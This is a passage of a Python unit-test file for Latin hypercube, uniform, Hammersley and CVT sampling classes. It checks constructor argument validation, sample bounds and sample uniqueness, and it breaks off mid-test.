        input_array = self.test_data_list
        with pytest.raises(ValueError):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type="selection")
    # --- constructor, 'creation' mode (bounds list input) ---
    @pytest.mark.unit
    def test__init__creation_01(self):
        input_array = self.test_data_list
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type=None)
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples,5)
    @pytest.mark.unit
    def test__init__creation_02(self):
        input_array = self.test_data_list
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples,5)
    @pytest.mark.unit
    def test__init__creation_03(self):
        input_array = self.test_data_list
        LHSClass = LatinHypercubeSampling( input_array, number_of_samples=100, sampling_type='creation')
        np.testing.assert_array_equal(LHSClass.data, input_array)
        np.testing.assert_array_equal(LHSClass.number_of_samples,100)
    @pytest.mark.unit
    def test__init__creation_04(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=0, sampling_type='creation')
    @pytest.mark.unit
    def test__init__creation_05(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=-1, sampling_type='creation')
    @pytest.mark.unit
    def test__init__creation_06(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=1.1, sampling_type='creation')
    @pytest.mark.unit
    def test__init__creation_07(self):
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
    @pytest.mark.unit
    def test__init__creation_08(self):
        input_array = self.test_data_pandas
        with pytest.raises(ValueError):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='creation')
    # --- constructor, invalid sampling_type values ---
    @pytest.mark.unit
    def test__init__creation_selection_01(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type=1)
    @pytest.mark.unit
    def test__init__creation_selection_02(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=None, sampling_type='jp')
    # --- sampling behaviour ---
    @pytest.mark.unit
    def test_variable_sample_creation(self):
        # All generated samples must lie within [minimum, maximum] and the
        # sample count must match number_of_samples.
        input_array = self.test_data_numpy
        for num_samples in [None,10,1]:
            LHSClass = LatinHypercubeSampling( input_array, number_of_samples=num_samples, sampling_type="selection")
            minimum, maximum = 10, 100
            out_var_samples = LHSClass.variable_sample_creation(minimum, maximum)
            assert (out_var_samples>=minimum).all() and (out_var_samples<=maximum).all()
            np.testing.assert_array_equal(LHSClass.number_of_samples, out_var_samples.shape[0])
    @pytest.mark.unit
    def test_lhs_points_generation(self):
        # Raw LHS points are in [0, 1] with one column per input variable.
        input_array = self.test_data_numpy
        for num_samples in [None,10,1]:
            LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
            out_sample_points_vector = LHSClass.lhs_points_generation()
            assert (out_sample_points_vector>=0).all() and (out_sample_points_vector<=1).all()
            np.testing.assert_array_equal(LHSClass.number_of_samples, out_sample_points_vector.shape[0])
            np.testing.assert_array_equal(input_array.shape[1] - 1,out_sample_points_vector.shape[1])
    @pytest.mark.unit
    def test_random_shuffling(self):
        # Shuffling must permute each column: sorting both arrays column-wise
        # yields identical results, and range/shape are preserved.
        input_array = self.test_data_numpy
        for num_samples in [None,10,1]:
            LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
            out_sample_points_vector = LHSClass.lhs_points_generation()
            vector_of_points = LHSClass.random_shuffling(out_sample_points_vector)
            sidx1 = out_sample_points_vector.argsort(axis=0)
            out1 = out_sample_points_vector[sidx1, np.arange(sidx1.shape[1])]
            sidx2 = vector_of_points.argsort(axis=0)
            out2 = vector_of_points[sidx2, np.arange(sidx2.shape[1])]
            assert (out_sample_points_vector>=0).all() and (out_sample_points_vector<=1).all()
            np.testing.assert_array_equal(out1, out2)
            np.testing.assert_array_equal(LHSClass.number_of_samples, out_sample_points_vector.shape[0])
            np.testing.assert_array_equal(input_array.shape[1] - 1,out_sample_points_vector.shape[1])
    @pytest.mark.unit
    def test_sample_points_01(self):
        # 'selection' mode: every sampled row is unique and drawn from the
        # original input array.
        for num_samples in [None,10,1]:
            input_array = self.test_data_numpy
            LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="selection")
            unique_sample_points = LHSClass.sample_points()
            expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
            out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
            np.testing.assert_array_equal(expected_testing,out_testing)
    @pytest.mark.unit
    def test_sample_points_02(self):
        # 'creation' mode: samples are unique and each variable stays within
        # its (min, max) bounds from the input list.
        for num_samples in [None,10,1]:
            input_array = self.test_data_list
            LHSClass = LatinHypercubeSampling(input_array, number_of_samples=num_samples, sampling_type="creation")
            unique_sample_points = LHSClass.sample_points()
            input_array = np.array(input_array)
            for i in range(input_array.shape[1]):
                var_range = input_array[:,i]
                assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class UniformSamplingTestCases(unittest.TestCase):
    """
    test__init__selection_01: input numpy array - Test behaviour generate UniformSampling object with selection, default edge, list_of_samples_per_variable = [2,5]
    test__init__selection_02: input Pandas DataFrame - Test behaviour generate UniformSampling object with selection, default edge, list_of_samples_per_variable = [2,5]
    test__init__selection_03: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is numpy, default edge
    test__init__selection_04: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is pandas, default edge
    test__init__selection_05: input numpy array - Test behaviour raise ValueError with a list_of_samples_per_variable < number of variables, default edge
    test__init__selection_06: input numpy array - Test behaviour raise ValueError with a list_of_samples_per_variable > number of variables, default edge
    test__init__selection_07: input numpy array - Test behaviour raise ValueError with a min(list_of_samples_per_variable) < 2, default edge
    test__init__selection_08: input numpy array - Test behaviour raise TypeError with a list_of_samples_per_variable is non integer, default edge
    test__init__selection_09: input numpy array - Test behaviour raise Exception with a list_of_samples_per_variable = [2,50], 2*50 > number of input data, default edge
    test__init__selection_10: input numpy array - Test behaviour generate UniformSampling object with selection, edge = True, list_of_samples_per_variable = [2,5]
    test__init__selection_11: input numpy array - Test behaviour generate UniformSampling object with selection, edge = False, list_of_samples_per_variable = [2,5]
    test__init__selection_12: input numpy array - Test behaviour raise Exception with edge = 1
    test__init__selection_13: input numpy array - Test behaviour raise Exception with edge = 'str'
    test__init__creation_01: input list - Test behaviour generate UniformSampling object with default sampling_type, default edge, list_of_samples_per_variable = [2,7,5]
    test__init__creation_02: input list - Test behaviour generate UniformSampling object with sampling_type = creation, default edge, list_of_samples_per_variable = [2,7,5]
    test__init__creation_03: input list - Test behaviour raise exception with a list_of_samples_per_variable = [1,7,5]
    test__init__creation_04: input list - Test behaviour raise exception with a list_of_samples_per_variable = [-1,7,5]
    test__init__creation_05: input list - Test behaviour raise exception with a list_of_samples_per_variable = [1.1,7,5] (non-integer)
    test__init__creation_06: input numpy - Test behaviour raise ValueError with numpy input
    test__init__creation_07: input Pandas - Test behaviour raise ValueError with Pandas input
    test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
    test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
    test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = [2,5],[3,2],[4,2]
    test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = [2,5,9],[3,2,10],[4,2,28]
    """
    # Fixtures mirror the LHS test case: numpy/pandas data with a trailing
    # 'y' column, and a two-row bounds list for 'creation' mode.
    def setUp(self):
        input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
        input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
                                       'x2': [10,10,10,10,10,10,10,10,10,10],
                                       'y': [11,14,19,26,35,46,59,74,91,110]})
        input_array_list = [[1,10,3],[2,11,4.5]]
        self.test_data_numpy = input_array_np
        self.test_data_pandas = input_array_pd
        self.test_data_list= input_array_list
    # --- constructor, 'selection' mode ---
    @pytest.mark.unit
    def test__init__selection_01(self):
        input_array = self.test_data_numpy
        UniClass = UniformSampling( input_array, [2,5], sampling_type="selection")
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples, 10)
        np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_02(self):
        input_array = self.test_data_pandas
        UniClass = UniformSampling( input_array, [2,5], sampling_type="selection")
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples, 10)
        input_array = input_array.to_numpy()
        np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_03(self):
        input_array = self.test_data_numpy
        with pytest.raises(TypeError):
            UniClass = UniformSampling( input_array, np.array([2,5]), sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_04(self):
        input_array = self.test_data_numpy
        with pytest.raises(TypeError):
            UniClass = UniformSampling( input_array, pd.DataFrame([2,5]), sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_05(self):
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            UniClass = UniformSampling( input_array, [2], sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_06(self):
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            UniClass = UniformSampling( input_array, [2,5,5], sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_07(self):
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            UniClass = UniformSampling( input_array, [-2,5], sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_08(self):
        input_array = self.test_data_numpy
        with pytest.raises(TypeError):
            UniClass = UniformSampling( input_array, [2.1,5], sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_09(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [2,50], sampling_type="selection")
    @pytest.mark.unit
    def test__init__selection_10(self):
        input_array = self.test_data_numpy
        UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=True)
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples, 10)
        np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_11(self):
        input_array = self.test_data_numpy
        UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=False)
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples, 10)
        np.testing.assert_array_equal(UniClass.x_data, input_array[:, :-1])
    @pytest.mark.unit
    def test__init__selection_12(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges=1)
    @pytest.mark.unit
    def test__init__selection_13(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [2,5], sampling_type="selection",edges='x')
    # --- constructor, 'creation' mode (bounds list input) ---
    @pytest.mark.unit
    def test__init__creation_01(self):
        input_array = self.test_data_list
        UniClass = UniformSampling( input_array, [2,7,5], sampling_type=None)
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples,2*7*5)
    @pytest.mark.unit
    def test__init__creation_02(self):
        input_array = self.test_data_list
        UniClass = UniformSampling( input_array, [2,7,5], sampling_type="creation")
        np.testing.assert_array_equal(UniClass.data, input_array)
        np.testing.assert_array_equal(UniClass.number_of_samples,2*7*5)
    @pytest.mark.unit
    def test__init__creation_03(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [1,7,5], sampling_type="creation")
    @pytest.mark.unit
    def test__init__creation_04(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [-1,7,5], sampling_type="creation")
    @pytest.mark.unit
    def test__init__creation_05(self):
        input_array = self.test_data_list
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [1.1,7,5], sampling_type="creation")
    @pytest.mark.unit
    def test__init__creation_06(self):
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            UniClass = UniformSampling( input_array, [2,5], sampling_type="creation")
    @pytest.mark.unit
    def test__init__creation_07(self):
        input_array = self.test_data_pandas
        with pytest.raises(ValueError):
            UniClass = UniformSampling( input_array, [2,5], sampling_type="creation")
    # --- constructor, invalid sampling_type values ---
    @pytest.mark.unit
    def test__init__creation_selection_01(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [2,5], sampling_type=1)
    @pytest.mark.unit
    def test__init__creation_selection_02(self):
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            UniClass = UniformSampling( input_array, [2,5], sampling_type='jp')
    # --- sampling behaviour ---
    @pytest.mark.unit
    def test_sample_points_01(self):
        # 'selection' mode: every sampled row is unique and drawn from the
        # original input array.
        for num_samples in [[2,5],[3,2],[4,2]]:
            input_array = self.test_data_numpy
            UniClass = UniformSampling(input_array, num_samples, sampling_type="selection")
            unique_sample_points = UniClass.sample_points()
            expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
            out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
            np.testing.assert_array_equal(expected_testing,out_testing)
    @pytest.mark.unit
    def test_sample_points_02(self):
        # 'creation' mode: samples are unique and each variable stays within
        # its (min, max) bounds from the input list.
        input_array = self.test_data_list
        for num_samples in [[2,5,9],[3,2,10],[4,2,28]]:
            input_array = self.test_data_list
            UniClass = UniformSampling(input_array, num_samples, sampling_type="creation")
            unique_sample_points = UniClass.sample_points()
            input_array = np.array(input_array)
            for i in range(input_array.shape[1]):
                var_range = input_array[:,i]
                assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class HammersleySamplingTestCases(unittest.TestCase):
    """
    __init__ = __init__ in LatinHypercubeSampling except Dimensionality problem:
    test__init__selection: Test behaviour with dimensionality > 10
    test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1
    test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1
    """
    # Fixtures: the usual 3-column data plus a 13-column array used to
    # trigger the dimensionality (> 10 variables) rejection.
    def setUp(self):
        input_array_np = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
        input_array_np_large = np.array([[0, 10, 11,1,2,3,4,5,6,7,8,9,10], [1, 10, 14,1,2,3,4,5,6,7,8,9,10], [2, 10, 19,1,2,3,4,5,6,7,8,9,10], [3, 10, 26,1,2,3,4,5,6,7,8,9,10], [4, 10, 35,1,2,3,4,5,6,7,8,9,10], [5, 10, 46,1,2,3,4,5,6,7,8,9,10], [6, 10, 59,1,2,3,4,5,6,7,8,9,10], [7, 10, 74,1,2,3,4,5,6,7,8,9,10], [8, 10, 91,1,2,3,4,5,6,7,8,9,10], [9, 10, 110,1,2,3,4,5,6,7,8,9,10]])
        input_array_pd = pd.DataFrame({'x1': [0,1,2,3,4,5,6,7,8,9],
                                       'x2': [10,10,10,10,10,10,10,10,10,10],
                                       'y': [11,14,19,26,35,46,59,74,91,110]})
        input_array_list = [[1,10,3],[2,11,4.5]]
        self.test_data_numpy = input_array_np
        self.test_data_numpy_large = input_array_np_large
        self.test_data_pandas = input_array_pd
        self.test_data_list= input_array_list
    @pytest.mark.unit
    def test__init__selection(self):
        # Too many input variables (> 10) must be rejected by the constructor.
        input_array = self.test_data_numpy_large
        with pytest.raises(Exception):
            HammersleyClass = HammersleySampling( input_array, number_of_samples=None, sampling_type="selection")
    @pytest.mark.unit
    def test_sample_points_01(self):
        # 'selection' mode: every sampled row is unique and drawn from the
        # original input array.
        for num_samples in [None,10,1]:
            input_array = self.test_data_numpy
            HammersleyClass = HammersleySampling(input_array, number_of_samples=num_samples, sampling_type="selection")
            unique_sample_points = HammersleyClass.sample_points()
            expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
            out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
            np.testing.assert_array_equal(expected_testing,out_testing)
    @pytest.mark.unit
    def test_sample_points_02(self):
        # 'creation' mode: samples are unique and each variable stays within
        # its (min, max) bounds from the input list.
        for num_samples in [None,10,1]:
            input_array = self.test_data_list
            HammersleyClass = HammersleySampling(input_array, number_of_samples=num_samples, sampling_type="creation")
            unique_sample_points = HammersleyClass.sample_points()
            input_array = np.array(input_array)
            for i in range(input_array.shape[1]):
                var_range = input_array[:,i]
                assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
            np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
class CVTSamplingTestCases(unittest.TestCase):
    """
    test__init__selection_01: input numpy array - Test behaviour generate object with selection, default number of sample = 5, default tolerance
    test__init__selection_02: input Pandas DataFrame - Test behaviour generate object with selection, default number of sample, default tolerance
    test__init__selection_03: input numpy array - Test behaviour generate object with selection, with a selected number of sample, default tolerance
    test__init__selection_04: input Pandas DataFrame - Test behaviour generate object with selection, with a selected number of sample, default tolerance
    test__init__selection_05: input numpy array - Test behaviour raise exception with a selected number of sample = 0, default tolerance
    test__init__selection_06: input numpy array - Test behaviour raise exception with a selected number of sample = -1, default tolerance
    test__init__selection_07: input numpy array - Test behaviour raise exception with a selected number of sample > input size, default tolerance
    test__init__selection_08: input numpy array - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer), default tolerance
    test__init__selection_09: input list - Test behaviour raise ValueError with list input
    test__init__selection_10: input numpy array - Test behaviour raise exception with tolerance > 0.1
    test__init__selection_11: input numpy array - Test behaviour raise Warning with a very small tolerance (1e-10)
    test__init__selection_12: input numpy array - Test behaviour tolerance 0.09
    test__init__selection_13: input numpy array - Test behaviour tolerance -0.09
    test__init__creation_01: input list - Test behaviour generate object with default sampling_type, default number of sample = 5, default tolerance
    test__init__creation_02: input list - Test behaviour generate object with sampling_type = creation, default number of sample = 5, default tolerance
    test__init__creation_03: input list - Test behaviour generate object with creation with a selected number of sample, default tolerance
    test__init__creation_04: input list - Test behaviour raise exception with a selected number of sample = 0
    test__init__creation_05: input list - Test behaviour raise exception with a selected number of sample = -1
    test__init__creation_06: input list - Test behaviour raise exception with a selected number of sample = 1.1 (non-integer)
    test__init__creation_07: input numpy - Test behaviour raise ValueError with numpy input
    test__init__creation_08: input numpy - Test behaviour raise ValueError with pandas input
    test__init__creation_09: input list - Test behaviour raise exception with tolerance > 0.1
    test__init__creation_10: input list - Test behaviour raise Warning with a very small tolerance (1e-10)
    test__init__creation_11: input list - Test behaviour tolerance 0.09
    test__init__creation_12: input list - Test behaviour tolerance -0.09
    test__init__creation_selection_01 - Test behaviour raise Exception with sampling_type = non string
    test__init__creation_selection_02 - Test behaviour raise Exception with sampling_type = incorrect string
    test_random_sample_selection_01 - Test random_sample_selection with size = (5,2)
    test_random_sample_selection_02 - Test random_sample_selection with size = (0,2)
    test_random_sample_selection_03 - Test random_sample_selection with size = (2,0)
    test_random_sample_selection_04 - Test behaviour raise ValueError with size = (5,-1)
    test_random_sample_selection_05 - Test behaviour raise TypeError with size =(5,1.1)
    Tests: : Unit tests for eucl_distance, a function that evaluates the distance between two points (u, v).
    Four demonstration tests are done:
    test_eucl_distance_01 - The first test checks that the correct result is obtained when both inputs are single value arrays.
    test_eucl_distance_02 - The second test checks that the correct result is returned when both inputs are 2D vectors.
    test_eucl_distance_03 - The third test checks that the correct result is returned when both inputs are arrays of the same size.
    test_eucl_distance_04 - The fourth test checks that the function is able to calculate the distance from a single point (n x 1 row vector) to a set of design points (supplied in an n x m array)
    Unit tests for create_centres, a function that generates new mass centroids for the design space based on McQueen's method.
    Four demonstration tests are done:
    test_create_centres_01 - The first test checks that the correct result for the new centres is returned when the counter is at its lowest value (1).
    test_create_centres_02 - The second test checks that the correct result for the new centres is returned when the counter is at an arbitrary value (10).
    test_create_centres_03 - The third test checks that the correct procedure is followed when one of the centres in initial_centres has no close design point to it.
    test_create_centres_04 - The fourth test checks that the approach works as expected for problems with more than two dimensions.
    test_sample_points_01: Test behaviour with selection, sample points are unique, all in the input array , number of samples = 5, 10, 1
    test_sample_points_02: Test behaviour with creation, sample points are unique, all in the input range (min,max) , number of samples = 5, 10, 1
    """

    def setUp(self):
        # Shared fixtures: a small numpy data set (last column is the output),
        # the same data as a pandas DataFrame, and a 2-row list of variable
        # bounds for "creation" mode.
        input_array_np = np.array(
            [[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35],
             [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
        input_array_pd = pd.DataFrame(
            {'x1': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
             'x2': [10, 10, 10, 10, 10, 10, 10, 10, 10, 10],
             'y': [11, 14, 19, 26, 35, 46, 59, 74, 91, 110]})
        input_array_list = [[1, 10, 3], [2, 11, 4.5]]
        self.test_data_numpy = input_array_np
        self.test_data_pandas = input_array_pd
        self.test_data_list = input_array_list

    @pytest.mark.unit
    def test__init__selection_01(self):
        # numpy input, all defaults: 5 centres, eps = 1e-7, x_data = inputs only.
        input_array = self.test_data_numpy
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=None, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 5)
        np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
        np.testing.assert_array_equal(CVTClass.eps, 1e-7)

    @pytest.mark.unit
    def test__init__selection_02(self):
        # pandas input, all defaults.
        input_array = self.test_data_pandas
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=None, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 5)
        input_array = input_array.to_numpy()
        np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
        np.testing.assert_array_equal(CVTClass.eps, 1e-7)

    @pytest.mark.unit
    def test__init__selection_03(self):
        # numpy input, explicit number_of_samples.
        input_array = self.test_data_numpy
        CVTClass = CVTSampling(input_array, number_of_samples=6,
                               tolerance=None, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 6)
        np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
        np.testing.assert_array_equal(CVTClass.eps, 1e-7)

    @pytest.mark.unit
    def test__init__selection_04(self):
        # pandas input, explicit number_of_samples.
        input_array = self.test_data_pandas
        CVTClass = CVTSampling(input_array, number_of_samples=6,
                               tolerance=None, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 6)
        input_array = input_array.to_numpy()
        np.testing.assert_array_equal(CVTClass.x_data, input_array[:, :-1])
        np.testing.assert_array_equal(CVTClass.eps, 1e-7)

    @pytest.mark.unit
    def test__init__selection_05(self):
        # number_of_samples = 0 is invalid.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=0,
                        tolerance=None, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_06(self):
        # Negative number_of_samples is invalid.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=-1,
                        tolerance=None, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_07(self):
        # number_of_samples larger than the data set is invalid.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=101,
                        tolerance=None, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_08(self):
        # Non-integer number_of_samples is invalid.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=1.1,
                        tolerance=None, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_09(self):
        # Selection mode requires array-like data, not a bounds list.
        input_array = self.test_data_list
        with pytest.raises(ValueError):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=None, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_10(self):
        # Tolerance above 0.1 is rejected.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=0.11, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_11(self):
        # A very small tolerance triggers a warning.
        input_array = self.test_data_numpy
        with pytest.warns(Warning):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=1e-10, sampling_type="selection")

    @pytest.mark.unit
    def test__init__selection_12(self):
        # A valid tolerance is stored as eps.
        input_array = self.test_data_numpy
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=0.09, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.eps, 0.09)

    @pytest.mark.unit
    def test__init__selection_13(self):
        # A negative tolerance is stored as eps.
        input_array = self.test_data_numpy
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=-0.09, sampling_type="selection")
        np.testing.assert_array_equal(CVTClass.eps, -0.09)

    @pytest.mark.unit
    def test__init__creation_01(self):
        # sampling_type=None defaults to creation mode.
        input_array = self.test_data_list
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=None, sampling_type=None)
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 5)

    @pytest.mark.unit
    def test__init__creation_02(self):
        # Explicit creation mode, default number of centres.
        input_array = self.test_data_list
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=None, sampling_type='creation')
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 5)

    @pytest.mark.unit
    def test__init__creation_03(self):
        # Creation mode with an explicit number of centres.
        input_array = self.test_data_list
        CVTClass = CVTSampling(input_array, number_of_samples=100,
                               tolerance=None, sampling_type='creation')
        np.testing.assert_array_equal(CVTClass.data, input_array)
        np.testing.assert_array_equal(CVTClass.number_of_centres, 100)

    @pytest.mark.unit
    def test__init__creation_04(self):
        # number_of_samples = 0 is invalid.
        input_array = self.test_data_list
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=0,
                        tolerance=None, sampling_type='creation')

    @pytest.mark.unit
    def test__init__creation_05(self):
        # Negative number_of_samples is invalid.
        input_array = self.test_data_list
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=-1,
                        tolerance=None, sampling_type='creation')

    @pytest.mark.unit
    def test__init__creation_06(self):
        # Non-integer number_of_samples is invalid.
        input_array = self.test_data_list
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=1.1,
                        tolerance=None, sampling_type='creation')

    @pytest.mark.unit
    def test__init__creation_07(self):
        # Creation mode requires a bounds list, not a numpy array.
        input_array = self.test_data_numpy
        with pytest.raises(ValueError):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=None, sampling_type='creation')

    @pytest.mark.unit
    def test__init__creation_08(self):
        # Creation mode requires a bounds list, not a DataFrame.
        input_array = self.test_data_pandas
        with pytest.raises(ValueError):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=None, sampling_type='creation')

    @pytest.mark.unit
    def test__init__creation_09(self):
        # Tolerance above 0.1 is rejected.
        input_array = self.test_data_list
        with pytest.raises(Exception):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=0.11, sampling_type="creation")

    @pytest.mark.unit
    def test__init__creation_10(self):
        # A very small tolerance triggers a warning.
        input_array = self.test_data_list
        with pytest.warns(Warning):
            CVTSampling(input_array, number_of_samples=None,
                        tolerance=1e-10, sampling_type="creation")

    @pytest.mark.unit
    def test__init__creation_11(self):
        # A valid tolerance is stored as eps.
        input_array = self.test_data_list
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=0.09, sampling_type="creation")
        np.testing.assert_array_equal(CVTClass.eps, 0.09)

    @pytest.mark.unit
    def test__init__creation_12(self):
        # BUG FIX: this method was previously also named
        # test__init__creation_11, silently shadowing the tolerance=0.09 test.
        input_array = self.test_data_list
        CVTClass = CVTSampling(input_array, number_of_samples=None,
                               tolerance=-0.09, sampling_type="creation")
        np.testing.assert_array_equal(CVTClass.eps, -0.09)

    @pytest.mark.unit
    def test__init__creation_selection_01(self):
        # Non-string sampling_type is invalid.
        input_array = self.test_data_numpy
        with pytest.raises(Exception):
